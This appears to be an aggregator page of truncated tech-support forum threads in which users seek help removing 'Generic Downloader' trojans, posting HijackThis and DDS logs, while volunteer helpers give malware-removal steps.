C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Expl...

A:Generic Downloader.z/trojan?

14 more replies

yea so i clicked a stupid youtube link and got this generic downloader virus. any help would be much appreciated. attached is the hijack log

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:48:20, on 1/16/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\Program Files\Intel\Wireless\Bin\WLKeeper.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Altiris\eXpress\Client Recovery Agent\AeXAgent.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Wave Systems Corp\Common\DataServer.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\McAfee\Common Framework\FrameworkService.exe
C:\Program Files\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\Program Files\Dell\NICCONFIGSVC\NICCONFIGSVC.exe
C:\Program Files\Intel\Wireless\Bin\RegSrvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\NTRU Cryptosystems\NTRU Hybrid TSS v2.0.7\bin\tcsd_win32.exe
C:\Program Files\Viewpoint\Common\ViewpointService.exe
C:\PROGRA~1...

A:Generic Downloader Trojan!!! Please Help

bump
 

1 more replies

PLEASE HELP!!!

It appears that I have a virus called 'Trojan Generic Downloader.k'. I am using McAfee Security Centre 7.1 and it detects it and tells me that it is deleting the Trojan, however when I restart my computer it is back. I am also getting some warning messages about possible un-authorized file changes or something??? There is also this icon named 'install' that keeps re-appearing on my desktop after each reboot, and my firewall ends up having errors that I need to go to a Virtual Technician on the McAfee website to fix. I've been reading forums for 3 days and trying everything I can find; nothing seems to be working for me. This is getting frustrating. McAfee tech support forum suggested I come here and post my logfile, they said you guys were awesome... so I'm giving it a try

Thank you in advance!!!
Here is my logfile (logfile could end up different after reboot??), hope someone can help me out.


Logfile of HijackThis v1.99.1
Scan saved at 6:17:41 PM, on 04/02/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0011)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\ehome\ehtray.exe
C:\Program Files\Java\jre1.5.0_09\bin\jusched.exe
C:\WINDOWS\sts...

A:Trojan Generic Downloader.k PLEASE HELP ME!!!!

Hi CaperJules,

Welcome to Tech Support Forum!

I apologize for the delay getting to your log. The helpers here are all volunteers and we have been very busy here lately. If you are still having malware problems, I will be glad to help.

First of all, you didn't unzip/extract HijackThis. I strongly advise you to unzip/extract HijackThis because HijackThis will not be able to make backups when it is run from the zip folder.

How to unzip HijackThis:
Right-click on the HijackThis zip folder and choose "Extract All".
An extraction wizard window will now open. Click "Next".
In the "Files will be extracted to this directory:" field, type C:\HijackThis. Then click "Next".
Click "Finish" to show your unzipped/extracted HijackThis folder. Run HijackThis.exe from here, or add a shortcut to your desktop.


NEXT:

Go to the Start menu, and click on Control Panel. Choose Add/Remove Programs and remove any of the following that are listed:

Lycos SideSearch
MySearch
MyWay
MyWay Search
MyWay Search Assistant
MyWay Speed Bar
MyWebSearch
MyWebSearch Bar
RXToolBar
Search Assistant - MySearch
Search Assistant - MyWebSearch
SideSearch


NEXT:

Please run HijackThis and click "Scan". Place a check (tick) next to the following entries (if present):

F3 - REG:win.ini: load=C:\WINDOWS\system32\fcsicgi\winlogon.exe
F3 - REG:win.ini: run=C:\WINDOWS\system32\fcsicgi\winlogon.exe
O2 - BHO: MyWebSearch Search ...

8 more replies

Hi all, please could you help, I've reached the limit of my knowledge and can't fix a problem. My wife's laptop has Vista installed. She disabled Windows Update, as far as I can tell, well over a year ago. Recently the laptop has been behaving unpredictably. I use the Firefox browser and periodically a new tab opens whilst I am browsing. I cannot run Windows Update, I get various error messages whenever I try. I've run the Samsung recover software which reinstalls key files from a hidden partition, but this hasn't helped. I ran a full scan using AVG free edition. It reported several infections, most of which AVG said it removed. It couldn't remove 2 infections. This is what the AVG report said . . .

"";"C:\Windows\System32\wuauclt.exe (1144):\memory_00010000";"Trojan horse Agent_r.XJ";"Object is inaccessible.""";"C:\Windows\System32\wuauclt.exe (1144)";"Trojan horse Agent_r.XJ";"""";"C:\Windows\explorer.exe (916):\memory_00010000";"Trojan horse Agent_r.XJ";"Object is inaccessible.""";"C:\Windows\explorer.exe (916)";"Trojan horse Agent_r.XJ";""

I've managed to attach the ark.txt file. (EDIT) I've added the attach.txt file in a reply to this post as I was having probs getting it to work. Many thanks in advance for any help...

A:generic trojan downloader and others

Hello and welcome to the forums!

My secret agent name on the forums is SweetTech (you can call me ST for short), it's a pleasure to meet you. I am very sorry for the delay in responding, but as you can see we are at the moment being flooded with logs which, when paired with the never-ending shortage of helpers, resulted in the delayed responding to your thread.

I would be glad to take a look at your log and help you with solving any malware problems.

If you have since resolved the issues you were originally experiencing, or have received help elsewhere, please inform me so that this topic can be closed. If you have not, please adhere to the guidelines below and then follow instructions as outlined further below:

Logs from malware removal programs (OTL is one of them) can take some time to analyze. I need you to be patient while I analyze any logs you post. Please remember, I am a volunteer, and I do have a life outside of these forums.

Please make sure to carefully read any instruction that I give you. Attention to detail is important! Since I cannot see or directly interact with your computer I am dependent on you to "be my eyes" and provide as much information as you can regarding the current state of your computer.

If you're not sure, or if something unexpected happens, do NOT continue! Stop and ask!

In Windows Vista and Windows 7, all tools need to be started by right clicking and selecting Run as Administrator!

These instru...

6 more replies

Hello

McAfee is reporting the above trojan on the system but cannot delete, clean or quarantine the file.

We've not noticed any "symptoms" or problems yet but obviously would like to avoid any that may start.

Do you need any more info to be able to advise what we should do?
Thanks in advance for your help.

This is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:52:02, on 11/07/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\McAfee.com\PERSON~1\MpfService.exe
C:\PROGRA~1\McAfee\SPAMKI~1\MSKSrvr.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\Analog Devices\Core\smax4pnp.exe
C:\Program Files\CyberLink\PowerDVD\DVDLauncher.exe
C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
C:\Program Files\McAfee.com\VSO\oasclnt.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\DLA\DLACTRLW.EXE
C:\Program File...

A:Generic Downloader.z trojan

15 more replies

The generic downloader.g trojan is attached to file t1157309568.dll. The location is C:\Documents and Settings\Owner\Local Settings\Temp. I've attached the hijackthis log. Thanks for the help

Logfile of HijackThis v1.99.1
Scan saved at 4:17:38 PM, on 9/3/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\VTTimer.exe
C:\Program Files\McAfee.com\VSO\mcvsshld.exe
C:\Program Files\McAfee.com\VSO\oasclnt.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
c:\progra~1\mcafee.com\vso\mcvsescn.exe
C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
C:\PROGRA~1\McAfee\MSC\McLogCln.exe
C:\Program Files\Nikon\PictureProject\NkbMonitor.exe
C:\Program Files\WinZip\WZQKPICK.EXE
C:\Program Files\Nikon\PictureProject In Touch\PictureProjectInTouch.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
c:\progra~1\mcafee.com\vso\mcvsftsn.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\PROGRA~1\McAfee\MSC\mclogsrv.exe
C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\MS...

A:Generic Downloader.g Trojan

11 more replies

running on windows vista premium home i have a log from hjt i am not too sure how long i want to be online with this disease ive got har har

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:05:40 PM, on 5/1/2008
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16643)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Sony\ISB Utility\ISBMgr.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files\Sony\VAIO PC Wireless LAN Wizard\AutoLaunchWLASU.exe
C:\Program Files\Grisoft\AVG7\avgcc.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\Grisoft\AVG7\avgwb....

A:Trojan Downloader Generic 7.gc

oh also its so annoying but i get denied access into my most important system files , i cannot uninstall the items that caused this its awful thanks

4 more replies

My operating system is Win XP Pro.

I've updated McAfee and have the latest versions and Win Service Pack 2.

I have a trojan named Generic Downloader.bt.

I've tried the following:

I ran a scan in Safe Mode with System Restore turned off.

I have McAfee AV.

I've run McAfee in Safe Mode.

File is: WINDOWS\SYSTEM32\XLIBGFL254.DLL

Can I start system in DOS and delete this file?
Get into correct directory and use the DEL command to delete this file?


Here is my log:

ComboScan v20070212.14 run by Terry Jackson on 2007-02-15 at 19:15:40
Computer is in Normal Mode.
--------------------------------------------------------------------------------

System Restore was disabled; re-enabling.
Failed to create restore point: System Restore is disabled (service is not running).
Performed disk cleanup.


-- HijackThis log (run as Terry Jackson.com) -----------------------------------

Logfile of HijackThis v1.99.1
Scan saved at 7:16:22 PM, on 2/15/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDO...

More replies

I have recently managed to get a trojan virus (trojan virus generic downloader) while using the internet, thinking I was downloading the latest version of Flash Player. Although I have located the file and deleted it, and when I run a scan on my computer it no longer picks it up, my computer is still running quite slow and a lot of programs are not responding. At random I will start hearing videos playing in the background without any window being open. It usually sounds like a news channel playing in the background which repeats itself over and over. It all started when I got the virus, which leads me to think they are linked.

I followed the steps you stated to do, by downloading GMER and DDS to get the necessary reports to display to you. I will attach them now.

I would be very grateful if you could help me with this problem and hopefully we can resolve this issue I'm having

thanks
Conor


DDS (Ver_10-03-17.01) - NTFSx86
Run by Conor at 17:29:38.46 on 31/08/2010
Internet Explorer: 8.0.7600.16385
Microsoft Windows 7 Enterprise 6.1.7600.0.1252.44.1033.18.959.153 [GMT 1:00]


============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Program Files\AVG\AVG9\avgchsvx.exe
C:\Program Files\AVG\AVG9\avgrsx.exe
C:\Windows\system32\lsm.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe...

A:Trojan generic downloader

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

Due to the restrictions on Windows 7, all tools should be started by right-click > Run as Administrator

------------------------------------------------------

Please visit this webpage for download links, and instructions for running ComboFix:

http://www.bleepingcomputer.com/comb...o-use-combofix

* Ensure you have disabled all antivirus and antimalware programs so they do not interfere with the running of ComboFix.

Get help here

Please post the C:\ComboFix.txt in your next reply for further review.

Please re-enable your antivirus before posting the ComboFix.txt log.

-----------------------------------------------...

6 more replies

Hi all,

After AVG scanned my comp. this morning it found a virus - Trojan Horse Downloader Generic.PST, and not being very computer literate, I am turning to you experts to let me know what I'm supposed to do now! When the window popped up saying 'virus found' I didn't know if I should delete it, so I put it in the virus vault (I have no idea if that was the right thing to do). Anyway, here's more details from AVG:

File name: VTUUV.DLL
File path: C:\WINDOWS\SYSTEM
Size 34.51 KB

Can someone please advise as to the steps I should take to get rid of this? My OS is WIN98 SE. Thanks so much for any replies!
 

A:Trojan Horse Downloader Generic. PST

16 more replies

AVG reported this found on 9th September but I only noticed today when the internet failed to react and I checked AVG. The internet will not work on IE and I am sending this via Firefox.

The full AVG message is:-
File: C:\WINDOWS\SYSTEM32\userinit.exe
Infection: Trojan horse Downloader.Generic10.QLN
Result: Object is whitelisted (critical/system file that should not be removed).

I have downloaded Malwarebyte from my Netbook but although it loads it will not run.

I should also mention that I am getting a Generic Host process for Win32 Services error which I understand occurs in XP service pack 2 - I have SP3 so this should not need the patch??

Can you help please.

A:Trojan Horse downloader generic 10.QLN

Hello and welcome.. Try this approach.

Reboot into Safe Mode with Networking

How to enter safe mode (XP)

Using the F8 Method

Restart your computer. When the machine first starts again it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. At this point you should gently tap the F8 key repeatedly until you are presented with a Windows XP Advanced Options menu. Select the option for Safe Mode with Networking using the arrow keys. Then press enter on your keyboard to boot into Safe Mode.

>>>> Download this file and doubleclick on it to run it. Allow the information to be merged with the registry.

RKill....

Download and Run RKill

Please download RKill by Grinler from one of the 4 links below and save it to your desktop.

Link 1
Link 2
Link 3
Link 4

Before we begin, you should disable the anti-malware software you have installed so it does not interfere with RKill running, as some anti-malware software detects RKill as malicious. Please refer to this page if you are not sure how.
Double-click on Rkill on your desktop to run it. (If you are using Windows Vista, please right-click on it and select Run As Administrator)
A black screen will appear and then disappear. Please do not worry, that is normal. This means that the tool has been successfully executed.
If nothing happens or if the tool does not run, please let me know in your next reply
Do not reboot your computer after running rkill as the malw...

18 more replies

Hi, I am new to the site, so I am not sure exactly what I need to post in regards to my question. I have AVG (free version) and within the past day, it continually pops up with "Threat Detected" while opening file....the most current file it displays is C:\WINDOWS\tk58.exe Trojan horse Generic3.UNS. I heal it each time, but it keeps happening more and more frequently. Also, I am getting an abundance of pop-ups every time I turn the computer on, even if Firefox and IE are closed. Please help! I have had this computer over 2 years and never had a problem, so this is very frustrating

Computer is a Dell Dimension E510 running Windows XP
Model Dell DM051
X86-based
x86 Family 15 Model 4 Stepping 4 GenuineIntel ~2793 Mhz

Please help, and let me know what additional info you need.

Thank you so much!
Jenny
 

More replies

I have AVG free edition, and every time I start up my computer it tells me that I have a Trojan horse Downloader.Generic.BUN, and it won't let me delete it or anything. Can someone tell me how to get rid of it, because every time I open an internet browser, my firewall tells me it is trying to access the internet.
 

A:Trojan horse Downloader.Generic.BUN

11 more replies

Hello, I am using AVG shield which picked up the virus. I am now getting popups from AVG asking me what I want to do with the virus. When I click either heal or send to vault it says an error message. I also use Spybot, Windows Defender and a few more, but AVG was the only one to pick it up. I don't know how to send a file log either. I am now running Stinger and then I will download HijackThis, any other suggestions?? Thanks

A:Trojan Horse Downloader.generic

I suggest you post a HijackThis log for examination.

A member of the HijackThis Team will walk you through, step by step, how to disinfect your computer.

Read How to post a HijackThis Log. Please read, and follow, all directions carefully!!!

Then, run a log, and post it in the HijackThis forum, at this link. Do not, fix anything, yet.

A member, of the HJT Team, will help you out.

It may take a while to get a response, because the HJT Team are very busy. Please, be patient, these people are volunteers. They will help you out, as soon as possible.

NOTE: Once you have made the post, please, DO NOT make another post in the HJT forum, until it has been responded to by a member of the HJT Team. The first thing they look for, when looking for logs to reply to, is 0 replies. If you make another post, there will be 1 reply. The team member, glancing over the replies, might assume someone is already helping you out, and will not respond. So, just make your post, and let it sit there, until a team member responds. This way you will be taken care of, in the most timely manner.

1 more replies

Hello every one,

seems that my time just arrive.
could you give me some help handling with this trojan Downloader.Generic.AEG ??

I'm also without task manager!!!

a curious thing is that i have installed a sp3 on my windows 2000, and hijackthis see sp2:

this hijack was made after run complete system scan of AVG antivirus professional and Ad-Aware SE personal (last version 1.06 updated)

attached a Hijackthis:

Logfile of HijackThis v1.99.1
Scan saved at 15:07:23, on 19-06-2005
Platform: Windows 2000 SP2 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\WINNT\stchost.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\Explorer.EXE
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\system32\spool\DRIVERS\W32X86\3\fppdis1.exe
C:\Programas\Google\Gmail Notifier\gnotify.exe
C:\WINNT\system32\spool\DRIVERS\W32X86\3\fpdisp5a.exe
C:\WINNT\loadqm.exe
C:\Programas\MSN Messenger\MsnMsgr.Exe
C:\Programas\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe
C:\Programas\Grisoft\AVG Free\avgwb.dat
C:\WINNT\system32\696671.exe
C:\Programas\Internet Expl...

A:Downloader.Generic.AEG trojan horse, please help!

7 more replies
A:Downloader.Generic.AEG trojan horse, please help!

duplicate closed

http://forums.techguy.org/t374153.html
 

1 more replies

AVG "heals" (or so it says) this virus every time but it keeps coming back. Windows XP Home Edition
 

A:Trojan Horse Downloader.Generic.NON

12 more replies

Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 8.1, 64 bit
Processor: Intel(R) Pentium(R) CPU 2020M @ 2.40GHz, Intel64 Family 6 Model 58 Stepping 9
Processor Count: 2
RAM: 6023 Mb
Graphics Card: Intel(R) HD Graphics, -1984 Mb
Hard Drives: C: Total - 464260 MB, Free - 412166 MB;
Motherboard: TOSHIBA, Portable PC
Antivirus: Windows Defender, Disabled

new here I got this trojan downloader generic that avg sees but once stops it my icons stop working and sound is gone too.

this my hijack this log

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 11:51:24 PM, on 4/11/2015
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.9600.17416)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\AVG\AVG2015\avgui.exe
C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
C:\WINDOWS\SysWOW64\ctfmon.exe
C:\Program Files (x86)\AVG Web TuneUp\avgcefrend.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\P...

More replies

Logfile of HijackThis v1.99.1
Scan saved at 00:17:04, on 14/07/2006
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\system32\rundll32.exe
C:\WINDOWS\system32\rundll32.exe
C:\PROGRA~1\SYMANT~1\SYMANT~1\vptray.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Waktu Solat\waktusolat.exe
C:\Program Files\Google\Google Talk\googletalk.exe
C:\Program Files\Analog Devices\ADSL USB MODEM\dslmon.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\Yahoo!\Messenger\ypager.exe
C:\WINDOWS\explorer.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\Program Files\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer,SearchURL = http://searchmiracle.com/sp.php

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://searchbar.findthewebsiteyouneed.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://searchbar.findthewebsiteyouneed.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchbar.findthewebsiteyouneed.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.findthewebsiteyouneed.com
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://searchbar.findthewebsiteyouneed.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://searchbar.findthewebsiteyouneed.com
R3 - URLSear...

A:trojan downloader generic hgt removal help

err.. i meant that i need help to remove this malware which is driving me out of my wits, as avg kept popping messages of infected files every time i'm connected to the net.

19 more replies

Has anyone found a fix for this Trojan Horse? I have looked everywhere and can't find anything on it, let alone how to fix it.
 

A:Trojan Horse Downloader Generic DRZ

10 more replies

My AVG Free Antivirus keeps flagging this but can't seem to do anything with it. How do I get rid of it? Help, please.

A:Trojan Horse Downloader. Generic. We

Hello weybrew

Try running AVG in Safe Mode. "How to Boot in "SAFE MODE" tutorial"

Also if you're using Win XP or 2000, download and scan with Ewido Anti-Malware v3.5

Ewido Install and Scan Instructions

11 more replies

This issue started last week. Seems to only have an effect with my IE8. Will usually only happen with my browser when I first open IE8. After that it seems to stay quiet and will wait a substantial amount of time before trying again. The following pages open and are difficult to close, once the pages start opening.


DDS (Ver_10-03-17.01) - NTFSx86
Run by Scott at 018.71 on Mon 09/27/2010
Interne...

A:Trojan Horse Downloader Generic 10

Hello and welcome to TSF.

If you still need help:
Please download Rootkit Unhooker and save it to your desktop.
Double-click RKUnhookerLE.exe to run it.
Click the Report tab, then click Scan
Check Drivers, Stealth Code, Files, and Code Hooks
Uncheck the rest, then click OK
When prompted to Select Disks for Scan, make sure C:\ is checked and click OK
Wait till the scanner has finished then go File > Save Report
Save the report somewhere you can find it. Click Close
Attach it in your next reply.

Note** you may get the following warning. It is ok, just ignore it.

"Rootkit Unhooker has detected a parasite inside itself!
It is recommended to remove parasite, okay?"

14 more replies
Answer Match 69.72%

Hi,
Would really appreciate some help. Have got this virus on my PC. I am running Windows XP. This is the message log below and I'm not sure what I need to do next.
Added to this, in order to receive any e-mails I have had to remove AVG (free) to get messages.
Any help would be appreciated.
Thanks
Start Time= 30/07/2006 21:44:50.59
Running from: C:\Documents and Settings\Maureen Dineen\Desktop

((((((((((((((((((((((((((((((((((((((((((((( Qoologic's Log )))))))))))))))))))))))))))))))))))))))))))))))))))

21:46:28.68

Qoologic uninstaller found and executed
Registry entries fixed
(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))
2006-07-30 21:35:32 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\AVG7"
2006-07-30 21:34:50 ( .D... ) "C:\Program Files\Grisoft"
2006-06-15 18:56:54 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\MSN Search Toolbar"
2006-06-15 18:54:20 ( .D... ) "C:\Program Files\MSN Toolbar Suite"
2006-06-04 13:10:38 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\Sonic"
2006-06-04 13:09:40 ( .D... ) "C:\Documents and Settings\Maureen Dineen\Application Data\Leadertech"
2006-06-04 11:15:04 ( .D... ) "C:\Program Files\PopCap Games"
2006-06-04 11:00:50 ( .D... ) "C:\Program Files\Zuma Deluxe"
2006-06-04 10:22:40 ( .D... ) "C:\Progra... Read more

A:Trojan Horse Downloader Generic ZIV

7 more replies
Answer Match 69.72%

I have been having terrible issues with my computer. I am computer stupid so be gentle with me. I run AVG free edition antivirus & I keep getting a box that says "Trojan horse Downloader.Generic.HGT". I try to fix it & it keeps coming back. What am I doing wrong? Also, I was running AOL Instant Messenger today. As soon as I logged on, it sent a message to everyone on my buddy list about wanting to put a picture of us on some website. If they clicked on it, then it gave them this virus as well. How come my virus protection did not stop this? I have included a copy of my HJT log. Any help you could provide would be greatly appreciated. Please remember, I don't know a whole lot about my computer. So whatever you may be able to explain, please do so in detail. Thanks so much, LisaM.



Logfile of HijackThis v1.99.1
Scan saved at 4:01:40 PM, on 6/21/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\relocater.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\Gris... Read more

A:Trojan horse Downloader.Generic.HGT

Hi LisaM and welcome to TSF.

You may wish to Subscribe to this thread (Thread Tools) so that you are notified when you receive a reply.


Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers when you are following the procedures below.


If there is anything you don't understand, please ask BEFORE proceeding with the fixes.



HijackThis in Temp Folder
You are running HijackThis from a temporary directory. It needs to be in a permanent folder. Please go into Windows Explorer, click on C:\ then click on File > New > Folder and call it HJT , or another name of your choice and move the HJT files to this folder. The program creates backup files that we may need to use later. If the program is in a Temporary folder, files may be deleted by you or automatically if your system is set to empty temp files.



Disable Microsoft Defender
Please disable your Windows Defender Real-time Protection, as it may hinder the removal of some entries.
Open Windows Defender.
Click on Tools, General Settings.
Scroll down and uncheck Turn on real-time protection (recommended).
After you uncheck this, click on the Save button and close Windows Defender.



Disable EwidoGuard
